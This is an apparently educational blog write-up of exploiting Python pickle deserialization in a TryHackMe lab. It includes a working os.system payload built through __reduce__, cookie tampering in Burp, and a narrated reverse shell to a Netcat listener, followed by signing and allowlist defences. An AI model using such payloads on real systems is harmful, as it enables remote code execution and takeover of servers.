Exploiting Insecure Deserialization Bugs Found in the Wild (Python Pickles)

This blog post was written by Ian Musyoka.

Introduction

Serialization is the process of converting an object into a byte stream so that it can be loaded elsewhere or stored in a database or file.

Python is widely used to build applications, and in our case today we’ll be exploiting a web application written in Django. In Python, the libraries used to serialize and deserialize data are pickle and, in Python 2, cPickle. In our case, we’ll be exploiting pickle.

We’ll be calling two built-in pickle functions: dumps, which serializes an object, and loads, which deserializes it.
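A minimal sketch of that round trip, assuming an illustrative dictionary (the data is made up, not taken from the lab):

```python
import pickle

# Illustrative data; any picklable Python object works.
original = {"name": "alice", "roles": ["admin", "dev"], "active": True}

# dumps() serializes the object into a bytes value.
blob = pickle.dumps(original)

# loads() rebuilds an equal object from those bytes.
restored = pickle.loads(blob)

print(type(blob).__name__)
print(restored == original)
```

The restored object is a new object equal to the original, not the same instance.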

HOW DOES THE VULNERABILITY OCCUR

Whenever unsanitized and unvalidated user input reaches pickle’s loads function, the program can be made to execute a malicious payload planted by an attacker. This may lead to remote code execution (RCE), which in turn may lead to data breaches or a complete system takeover.
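To see why loads is dangerous, here is a harmless sketch of the underlying mechanism. It assumes a hypothetical class named Demo whose __reduce__ method tells pickle which callable to invoke on load; os.getcwd stands in for whatever an attacker would really choose:

```python
import os
import pickle

class Demo:
    def __reduce__(self):
        # pickle stores this (callable, args) pair; loads() later calls it.
        return (os.getcwd, ())

payload = pickle.dumps(Demo())

# loads() runs os.getcwd() instead of rebuilding a Demo instance.
result = pickle.loads(payload)
print(result)
```

The loader never asked to call os.getcwd; the byte stream decided that. Swapping in a different callable is all it takes to turn this into code execution.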

ATTACK VECTORS THAT ADVERSARIES USE

The most common attack scenario leading to remote code execution is trusting pickled data transmitted over an unencrypted network connection (for example, plain HTTP). If the connection is unencrypted, the data can be modified on the wire.

Another attack scenario is when an attacker can access and modify a stored pickle file from a cache, file system, or database.

A third scenario is a web application that deserializes input supplied by the user, or an attacker, through a parameter.

All of the above cases may lead to a complete system compromise.

A SIMPLE PYTHON PROGRAM EXPLAINING PICKLING (CLIENT.PY)

Let’s start by creating a simple client application that takes data in a dictionary format and serializes the data.

The source of the client application is shown below. It begins with the #!/usr/bin/env python3 shebang line and an import from base64.

 

 

On saving the script and executing it we get the output in the byte format.

 

Serialized data is normally stored in base64-encoded form, since some of its bytes are not printable. So I extended my Python script to base64-encode the serialized data after generating it.
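The original script is not reproduced here, so the following is only a sketch of what such a client might look like. The dictionary contents are assumptions, and protocol 4 is pinned explicitly so the output matches the gASV prefix discussed later:

```python
#!/usr/bin/env python3
from base64 import b64encode
import pickle

# Hypothetical sample record; the original script's data is not shown.
data = {"username": "guest", "id": 1}

# Raw pickle bytes, some of which are not printable.
raw = pickle.dumps(data, protocol=4)

# Base64 turns the bytes into printable ASCII text.
encoded = b64encode(raw).decode()

print(raw)
print(encoded)
```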

 

 

After executing the script we get the generated serialized data in a base64 encoded format as shown below:

This program by itself isn’t malicious, but when pickle is combined with modules such as os, or with built-in functions like exec or eval, it may lead to remote code execution.

A SIMPLE PYTHON PROGRAM EXPLAINING PICKLING (SERVER.PY)

Next, we are creating the server application. This is the application that will deserialize the object to give us back the original data.

The server takes the serialized object from a file and deserializes it to give us back the original object.

The source code to the server application is shown below:

 

Next, I generated serialized data which is encoded with base64 and saved it to a file called pickled_data as shown below:

 

Next, I ran the server application and we see we get back the original data that we had pickled earlier.
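As a rough sketch of the server step (not the original source), the snippet below first writes a base64-encoded pickle to a file named pickled_data, as in the post, and then reads it back. The temporary directory and the sample record are assumptions made so the example is self-contained:

```python
#!/usr/bin/env python3
from base64 import b64decode, b64encode
import os
import pickle
import tempfile

# Stand-in for the client step: write a base64 pickle to pickled_data.
path = os.path.join(tempfile.mkdtemp(), "pickled_data")
with open(path, "wb") as fh:
    fh.write(b64encode(pickle.dumps({"username": "guest", "id": 1})))

# Server step: read the file, base64-decode it, then deserialize.
with open(path, "rb") as fh:
    restored = pickle.loads(b64decode(fh.read()))

print(restored)
```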

 

 

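The signature of a base64-encoded Python pickle produced with protocol 4 is gASV. That’s how you can identify an encoded payload. In hexadecimal, the same stream starts with 800495 followed by an 8-byte frame length, for example 8004952600000000000000. (Dumps that show c28004c295 are the same bytes after being mangled by UTF-8 encoding.)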
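That check can be sketched as a small heuristic. The function name looks_like_pickle is hypothetical, and the test is only a hint that a value deserves a closer look, not proof that it is a pickle:

```python
from base64 import b64decode, b64encode
import binascii
import pickle

def looks_like_pickle(text: str) -> bool:
    """Heuristic: does this base64 text decode to a protocol 2+ pickle?"""
    try:
        raw = b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    # 0x80 is the PROTO opcode and the next byte is the protocol number.
    # A complete pickle ends with the STOP opcode, b".".
    return (len(raw) >= 3 and raw[0] == 0x80
            and 2 <= raw[1] <= 5 and raw.endswith(b"."))

sample = b64encode(pickle.dumps("1", protocol=4)).decode()
print(sample[:4], looks_like_pickle(sample), looks_like_pickle("aGVsbG8="))
```

The bytes 0x80 0x04 0x95 are the PROTO opcode, the protocol number, and the FRAME opcode, which is why protocol 4 pickles base64-encode to a string starting with gASV.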

As long as unsanitized and unvalidated user input is passed to pickle.loads(), it may lead to code execution, and once an attacker has code executing on a system, the next step is to get a shell.

For the proof of concept, we’ll be using a lab from TryHackMe called Unbaked Pie.

The first step is initial recon using Nmap, a utility for network exploration and security auditing. It supports ping scanning (determining which hosts are up), many port scanning techniques, version detection (determining the service protocols and application versions listening behind ports), and TCP/IP fingerprinting (remote host OS or device identification). Once the Nmap scan completes, we see that only one port comes back open:

Port 5003

 

 

 

 

 

 

Looking through the fingerprint information, it looks like it’s running an HTTP service. I opened the web application in Mozilla Firefox, and as the screenshot below shows, we get a standard web application.

 

The next logical step is some web application enumeration: brute-forcing potential subdomains, running the gobuster tool, and testing each parameter that accepts user input for vulnerabilities such as SQL Injection, Cross-Site Scripting, Server-Side Request Forgery, Command Injection, Local File Inclusion, etc. Today, though, we’ll focus on the areas of the web application that accept user input.

First I intercepted the request using Burp Suite. Looking at the request, we have already been assigned a Cross-Site Request Forgery token, which is meant to prevent Cross-Site Request Forgery attacks on the web application.

 

But going back to the web application we were allowed to search for content.

 

I began by searching for the number 1, intercepted the request using Burp Suite, and sent it to the Repeater tab.

 

After forwarding the query, the server assigns us another cookie and this time it’s called search_cookie.

 

Looking at the cookie, it appears to be base64 encoded and looks like a pickle-serialized object, since it begins with the string gASV.

I copied the string and tried deserializing it in a Python interactive shell.

 

We get back the string 1 which we had sent to the server. Next, I tried querying using my name, Musyoka. Looking at the screenshot below, we get a different base64-encoded serialized object.

 

On decoding and deserializing the string, we get back my name, Musyoka.

 

Sweet! Now we are confident that the application is just serializing the data given by the user and storing the serialized object in a cookie called search_cookie.
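When inspecting a cookie like this, pickletools from the standard library can walk the opcode stream without executing it, which is safer than calling loads on data you did not create. The sketch below builds a stand-in cookie locally instead of using the value captured from the lab:

```python
from base64 import b64decode, b64encode
import pickle
import pickletools

# Stand-in for a captured search_cookie value (built locally for the demo).
cookie = b64encode(pickle.dumps("1", protocol=4)).decode()
raw = b64decode(cookie)

# genops() yields (opcode, argument, position) without running anything.
for opcode, arg, pos in pickletools.genops(raw):
    print(pos, opcode.name, arg)

# String arguments show the embedded data; these opcodes import or call objects.
CALL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "BUILD"}
strings = [arg for _, arg, _ in pickletools.genops(raw) if isinstance(arg, str)]
risky = [op.name for op, _, _ in pickletools.genops(raw) if op.name in CALL_OPCODES]
print(strings, risky)
```

A cookie that only carries a search string should show no import or call opcodes at all, so an empty risky list is what a benign value looks like.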

 

Since we have full control of the serialized object, what if we replace it with a weaponized object?

I created a script that will spawn a new process on the victim’s machine and ping our box. This is the first proof of concept that I normally use because reverse shells sometimes don’t work due to firewall implementations.
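The original exploit source is not reproduced here. A minimal sketch of this kind of ping proof of concept, for use only against a lab you are authorized to test, could look like the following. The class name PingProbe and the address 10.10.10.10 are placeholders, and the payload is only built here, never loaded locally:

```python
from base64 import b64encode
import os
import pickle

class PingProbe:
    """When unpickled, makes the loader run a ping back to the tester."""

    def __init__(self, command: str):
        self.command = command

    def __reduce__(self):
        # loads() on the receiving side will call os.system(self.command).
        return (os.system, (self.command,))

# 10.10.10.10 is a placeholder for the tester's own lab address.
probe = PingProbe("ping -c 3 10.10.10.10")
payload = b64encode(pickle.dumps(probe, protocol=4)).decode()
print(payload)
```

A ping makes a good first probe because it only needs outbound ICMP, and the result is easy to confirm with a packet capture on the tester's side.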

The source code of the exploit is shown below:

 

On executing the exploit it generates a base64 encoded serialized payload which I added to my cookie.

 

 

Next, I set up a tcpdump listener to listen for incoming ICMP packets.

 

The requests are being sent and upon checking my box, I got the pings.

 

 

 

Sweet! We have command execution on the server. The next step is to try and get a reverse shell on the system. I used a bash reverse shell since it’s the most reliable one.

 

I again generated the payload and copied it into the cookie value.

 

Next, I set up a Netcat listener on port 9001, the port I had specified in the payload.

 

I forwarded the payload using Burp Suite.

 

Going back to my Netcat listener I got a root shell on the box.

 

 

 

REVIEWING THE SOURCE CODE

After getting a shell on the server, I wanted to see how the code had been implemented. Looking at the source code, we can see the vulnerable function.

 

The function seems to be performing a pickle.loads() on the cookie used by the web application without doing any sanitization whatsoever.

 

Also, we get to see how the search_cookie is generated. The web application takes the query input from the user, serializes it, and sets it as a cookie.
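The application’s actual source is not reproduced here, but the pattern it describes can be sketched without any web framework. The function names make_search_cookie and read_search_cookie are hypothetical stand-ins for the two code paths:

```python
from base64 import b64decode, b64encode
import pickle

def make_search_cookie(query: str) -> str:
    # Serialize the user's query and encode it for use as a cookie value.
    return b64encode(pickle.dumps(query, protocol=4)).decode()

def read_search_cookie(cookie_value: str):
    # VULNERABLE: the cookie is client-controlled, yet it goes straight
    # into pickle.loads() with no integrity check.
    return pickle.loads(b64decode(cookie_value))

cookie = make_search_cookie("1")
print(cookie, read_search_cookie(cookie))
```

Because the browser sends the cookie back on every request, anything the client puts in it reaches pickle.loads() unchanged.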

 

That’s how the vulnerability occurs. I created a short Python script that automates the entire process: creating a pickled payload, submitting it to the web server, and giving us a shell on the system. The source code for the exploit is shown below.

 

 

Let’s test the exploit.

 

 

The exploit works perfectly!

Prevention

  1. Validate and verify data to make sure user input meets the expected criteria. Use an allowlist of expected types and data.
  2. Isolate deserialization and run it in a low-privileged environment.
  3. Where pickle data is stored, review file system permissions to ensure access to the data is protected.
  4. Where a secure connection is not possible, any alteration of the pickle can be detected using a cryptographic signature. The pickle can be signed before storage or transmission, and its signature verified before loading it on the receiver side.
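Points 1 and 4 can be sketched together with the standard library. This is an illustration under assumptions, not a drop-in fix: SECRET_KEY, the allowlist contents, and the helper names sign, verify, and safe_loads are all hypothetical.

```python
import builtins
import hashlib
import hmac
import io
import pickle

SECRET_KEY = b"replace-with-a-real-secret"  # hypothetical key for the demo

def sign(blob: bytes) -> bytes:
    # Prepend a 32-byte HMAC-SHA256 tag to the pickle bytes.
    return hmac.new(SECRET_KEY, blob, hashlib.sha256).digest() + blob

def verify(signed: bytes) -> bytes:
    tag, blob = signed[:32], signed[32:]
    expected = hmac.new(SECRET_KEY, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch; refusing to unpickle")
    return blob

class AllowlistUnpickler(pickle.Unpickler):
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module, name):
        # Only globals on the allowlist may be imported during loading.
        if (module, name) in self.ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(signed: bytes):
    # Check the signature first, then load with the restricted unpickler.
    return AllowlistUnpickler(io.BytesIO(verify(signed))).load()

token = sign(pickle.dumps({"query": "1"}))
print(safe_loads(token))
```

The signature stops tampering by anyone who lacks the key, and the allowlist limits the damage if a signed but hostile pickle ever gets through. For plain data such as a search string, a format like JSON avoids the problem entirely.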


Disclaimer

The MacroSec blogs are solely for informational and educational purposes. Any actions and/or activities related to the material contained within this website are solely your responsibility. The misuse of the information on this website can result in criminal charges brought against the persons in question. The authors and MacroSec will not be held responsible in the event any criminal charges are brought against any individuals misusing the information on this website to break the law.